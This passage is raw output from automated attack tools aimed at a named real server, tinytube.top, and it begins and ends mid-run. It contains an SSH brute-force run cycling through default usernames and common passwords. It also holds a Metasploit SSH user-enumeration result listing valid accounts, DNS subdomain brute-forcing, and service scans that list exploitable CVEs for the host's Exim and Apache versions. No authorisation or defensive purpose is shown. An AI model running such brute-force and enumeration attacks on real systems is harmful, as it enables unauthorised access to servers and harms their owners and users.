212.86.108.165:22] Trying username/password pair: test:password NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:iloveyou NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:iloveu Completed NSE at 00:45, 90.76s elapsed Initiating NSE at 00:45 Completed NSE at 00:45, 0.05s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-auth-methods: | Supported authentication methods: | publickey |_ password | ssh-hostkey: | 2048 89:e2:fc:31:f3:d0:4d:b0:17:85:f9:83:ef:c3:cf:a4 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUFQm0uy2dTmkm24ajIdy8XrH6ywI2JPjLYXzmT4Oy7snGV4OMhWWhSpqVVRZ5ZQPn1O1q7h4M2CJdhC2c2cp4rwHkLRWM7+4WW3aLynC1Nb+wPd391CUuE6gG5RgZyFu0IEFa/ktIo2cyNLMbXS9ZcKmh7vtuDpBFr02Ou6a3Uy4uF8ICjDzZpdtmJe7y/DOspkvg5AvQYsmLj8Sj06o/me/sgHwCvVP7nYpBdGrEAg64t9/kNMNCEfjbo4rL1lMYOpwzJ5dxMAV17hxje4/CICtnLceZJZcEEpc5zLFJue0DGsEGPGS34xJh5Bks89oVDrHz0vVCDP7f4lKhS/JN | 256 a9:72:e2:82:ba:05:fc:44:19:1d:9a:c3:15:c0:89:28 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPOo/GnwYqLI/+z6nfx9VuvtSae7gab/iqBi2kvdgzqS/UOec7sO5Z057GNByM4oTAMe//zECtXjFoOQb/jvczM= | 256 3a:ca:80:35:34:89:6f:e5:f0:40:a3:10:e5:95:be:f7 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFQ6Rql9e7IoIjQcm79Uvc6mJC4y4cb6FsWvvrDhM1BS | ssh-publickey-acceptance: |_ Accepted Public Keys: No public keys accepted |_ssh-run: Failed to specify credentials and command to run. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.8 - 3.11 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.443 days (since Wed Aug 26 14:08:32 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 33.01 ms 10.203.11.1 2 39.99 ms v131.ce06.wdc-02.us.leaseweb.net (207.244.84.157) 3 40.58 ms be-5.br02.wdc-02.us.leaseweb.net (173.208.126.22) 4 42.20 ms ash-b1-link.telia.net (62.115.182.174) 5 42.40 ms rest-bb1-link.telia.net (80.91.248.156) 6 125.10 ms prs-bb4-link.telia.net (62.115.122.158) 7 129.10 ms adm-bb4-link.telia.net (213.155.136.167) 8 131.16 ms adm-b6-link.telia.net (62.115.116.125) 9 131.12 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 10 ... 11 131.33 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:45 Completed NSE at 00:45, 0.00s elapsed Initiating NSE at 00:45 Completed NSE at 00:45, 0.00s elapsed ##################################################################################################################################### USER_FILE => /usr/share/brutex/wordlists/simple-users.txt RHOSTS => 212.86.108.165 RHOST => 212.86.108.165 [*] 212.86.108.165:22 - SSH - Using malformed packet technique [*] 212.86.108.165:22 - SSH - Starting scan [+] 212.86.108.165:22 - SSH - User 'admin' found [+] 212.86.108.165:22 - SSH - User 'administrator' found [+] 212.86.108.165:22 - SSH - User 'anonymous' found [+] 212.86.108.165:22 - SSH - User 'backup' found [+] 212.86.108.165:22 - SSH - User 'bee' found [+] 212.86.108.165:22 - SSH - User 'ftp' found [+] 212.86.108.165:22 - SSH - User 'guest' found [+] 212.86.108.165:22 - SSH - User 'GUEST' found [+] 212.86.108.165:22 - SSH - User 'info' found [+] 212.86.108.165:22 - SSH - User 'mail' found [+] 212.86.108.165:22 - SSH - User 'mailadmin' found [+] 212.86.108.165:22 - SSH - User 'msfadmin' found [+] 212.86.108.165:22 - SSH - User 'mysql' found [+] 212.86.108.165:22 - SSH - User 'nobody' found [+] 212.86.108.165:22 - SSH - User 'oracle' found [+] 212.86.108.165:22 - SSH - User 'owaspbwa' found [+] 212.86.108.165:22 - SSH - User 'postfix' found [+] 212.86.108.165:22 - SSH - User 'postgres' found [+] 212.86.108.165:22 - SSH - User 'private' found [+] 212.86.108.165:22 - SSH - User 'proftpd' found [+] 212.86.108.165:22 - SSH - User 'public' found [+] 212.86.108.165:22 - SSH - User 'root' found [+] 212.86.108.165:22 - SSH - User 'superadmin' found [+] 212.86.108.165:22 - SSH - User 'support' found [+] 212.86.108.165:22 - SSH - User 'sys' found [+] 212.86.108.165:22 - SSH - User 'system' found [+] 212.86.108.165:22 - SSH - User 'systemadmin' found [+] 212.86.108.165:22 - SSH - User 'systemadministrator' found [+] 212.86.108.165:22 - SSH - User 'test' found [+] 212.86.108.165:22 - SSH - User 'tomcat' found [+] 212.86.108.165:22 - SSH - User 'user' found [+] 212.86.108.165:22 - SSH - User 'webmaster' found [+] 212.86.108.165:22 - SSH - User 'www-data' found [+] 212.86.108.165:22 - SSH - User 'Fortimanager_Access' found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:46 EDT NSE: Loaded 55 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:46 Completed NSE at 00:46, 0.00s elapsed Initiating NSE at 00:46 Completed NSE at 00:46, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:46 Completed Parallel DNS resolution of 1 host. at 00:46, 0.03s elapsed Initiating SYN Stealth Scan at 00:46 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 25/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:46, 0.15s elapsed (1 total ports) Initiating Service scan at 00:46 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:46, 0.28s elapsed (1 service on 1 host) Initiating OS detection (try #1) against tinytube.top (212.86.108.165) Retrying OS detection (try #2) against tinytube.top (212.86.108.165) Initiating Traceroute at 00:46 Completed Traceroute at 00:46, 3.01s elapsed Initiating Parallel DNS resolution of 9 hosts. at 00:46 Completed Parallel DNS resolution of 9 hosts. at 00:46, 0.04s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:46 NSE Timing: About 71.23% done; ETC: 00:48 (0:00:30 remaining) Completed NSE at 00:48, 90.74s elapsed Initiating NSE at 00:48 Completed NSE at 00:48, 0.00s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 25/tcp open smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello tinytube.top [207.244.84.141], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | smtp-enum-users: |_ Method RCPT returned a unhandled status code. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed | smtp-vuln-cve2010-4344: | Exim version: 4.89 | Exim heap overflow vulnerability (CVE-2010-4344): | Exim (CVE-2010-4344): NOT VULNERABLE | Exim privileges escalation vulnerability (CVE-2010-4345): | Exim (CVE-2010-4345): NOT VULNERABLE |_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit' | vulners: | cpe:/a:exim:exim:4.89: | CVE-2019-15846 10.0 https://vulners.com/cve/CVE-2019-15846 | CVE-2019-13917 10.0 https://vulners.com/cve/CVE-2019-13917 | CVE-2019-10149 7.5 https://vulners.com/cve/CVE-2019-10149 | CVE-2018-6789 7.5 https://vulners.com/cve/CVE-2018-6789 | CVE-2017-16943 7.5 https://vulners.com/cve/CVE-2017-16943 | CVE-2020-8015 7.2 https://vulners.com/cve/CVE-2020-8015 | CVE-2017-16944 5.0 https://vulners.com/cve/CVE-2017-16944 |_ CVE-2017-1000369 2.1 https://vulners.com/cve/CVE-2017-1000369 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.444 days (since Wed Aug 26 14:08:30 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=256 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 25/tcp) HOP RTT ADDRESS 1 33.73 ms 10.203.11.1 2 36.72 ms v131.ce05.wdc-02.us.leaseweb.net (207.244.84.156) 3 36.77 ms edm-019.yelaiyehao.com (173.208.126.20) 4 37.84 ms ash-b1-link.telia.net (62.115.182.174) 5 38.35 ms rest-bb1-link.telia.net (80.91.248.156) 6 ... 7 129.84 ms adm-bb4-link.telia.net (213.155.136.167) 8 131.02 ms adm-b6-link.telia.net (62.115.116.125) 9 126.73 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 10 ... 11 128.29 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:48 Completed NSE at 00:48, 0.00s elapsed Initiating NSE at 00:48 Completed NSE at 00:48, 0.00s elapsed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:49 EDT NSE: Loaded 64 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:49 Completed NSE at 00:49, 0.00s elapsed Initiating NSE at 00:49 Completed NSE at 00:49, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:49 Completed Parallel DNS resolution of 1 host. at 00:49, 0.03s elapsed Initiating SYN Stealth Scan at 00:49 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 53/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:49, 0.17s elapsed (1 total ports) Initiating Service scan at 00:49 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:49, 6.26s elapsed (1 service on 1 host) Initiating OS detection (try #1) against tinytube.top (212.86.108.165) Retrying OS detection (try #2) against tinytube.top (212.86.108.165) Initiating Traceroute at 00:49 Completed Traceroute at 00:50, 3.01s elapsed Initiating Parallel DNS resolution of 10 hosts. at 00:50 Completed Parallel DNS resolution of 10 hosts. at 00:50, 0.44s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:50 Completed NSE at 00:50, 13.65s elapsed Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux) |_dns-fuzz: Server didn't response to our probe, can't fuzz | dns-nsec-enum: |_ No NSEC records found | dns-nsec3-enum: |_ DNSSEC NSEC3 not supported | dns-nsid: |_ bind.version: 9.10.3-P4-Debian Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.439 days (since Wed Aug 26 14:18:39 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | dns-blacklist: | SPAM |_ dnsbl.inps.de - FAIL | dns-brute: | DNS Brute-force hostnames: | mail.tinytube.top - 212.86.108.165 | www.tinytube.top - 212.86.108.165 | ftp.tinytube.top - 212.86.108.165 |_ smtp.tinytube.top - 212.86.108.165 TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 32.78 ms 10.203.11.1 2 37.21 ms v131.ce06.wdc-02.us.leaseweb.net (207.244.84.157) 3 37.34 ms edm-017.yelaiyehao.com (173.208.126.18) 4 38.98 ms ash-b1-link.telia.net (62.115.182.174) 5 35.26 ms ash-bb2-link.telia.net (62.115.143.120) 6 126.66 ms prs-bb3-link.telia.net (62.115.112.243) 7 124.47 ms adm-bb3-link.telia.net (213.155.136.20) 8 127.68 ms adm-b6-link.telia.net (62.115.117.115) 9 123.67 ms novoserve-svc069390-ic354347.c.telia.net (62.115.188.167) 10 ... 11 129.31 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed ##################################################################################################################################### HTTP/1.1 200 OK Date: Thu, 27 Aug 2020 04:50:16 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 18 Aug 2020 13:31:05 GMT ETag: "c34-5ad26e6302e47" Accept-Ranges: bytes Content-Length: 3124 Vary: Accept-Encoding Content-Type: text/html Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:50 EDT NSE: Loaded 159 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed Initiating NSE at 00:50 Completed NSE at 00:50, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:50 Completed Parallel DNS resolution of 1 host. at 00:50, 0.03s elapsed Initiating SYN Stealth Scan at 00:50 Scanning tinytube.top (212.86.108.165) [1 port] Discovered open port 80/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:50, 0.17s elapsed (1 total ports) Initiating Service scan at 00:50 Scanning 1 service on tinytube.top (212.86.108.165) Completed Service scan at 00:50, 6.75s elapsed (1 service on 1 host) NSE: Script scanning 212.86.108.165. Initiating NSE at 00:50 Completed NSE at 00:52, 90.33s elapsed Initiating NSE at 00:52 Completed NSE at 00:52, 6.55s elapsed Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.13s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-brute: |_ Path "/" does not require authentication |_http-chrono: Request times for /; avg: 3073.31ms; min: 1499.28ms; max: 3821.52ms |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-date: Thu, 27 Aug 2020 04:50:34 GMT; -2s from local time. |_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) |_http-fetch: Please enter the complete path of the directory to save data in. | http-headers: | Date: Thu, 27 Aug 2020 04:50:56 GMT | Server: Apache/2.4.25 (Debian) | Connection: close | Content-Type: text/html; charset=UTF-8 | |_ (Request type: HEAD) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-mobileversion-checker: No mobile version detected. | http-php-version: Logo query returned unknown hash 405ebdb6bb84f2ea374e802337a84acf |_Credits query returned unknown hash d219c56aa1b3f7aebc846f745a80496c |_http-security-headers: |_http-server-header: Apache/2.4.25 (Debian) | http-sitemap-generator: | Directory structure: | / | Other: 1; js: 1 | /images/ | jpg: 5 | Longest directory structure: | Depth: 1 | Dir: /images/ | Total files found (by extension): |_ Other: 1; jpg: 5; js: 1 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-title: Tiny Tube | http-vhosts: |_127 names had status 200 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit= for deeper analysis) |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php |_http-xssed: No previously reported XSS vuln. | vulners: | cpe:/a:apache:http_server:2.4.25: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668 | CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169 | CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167 | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 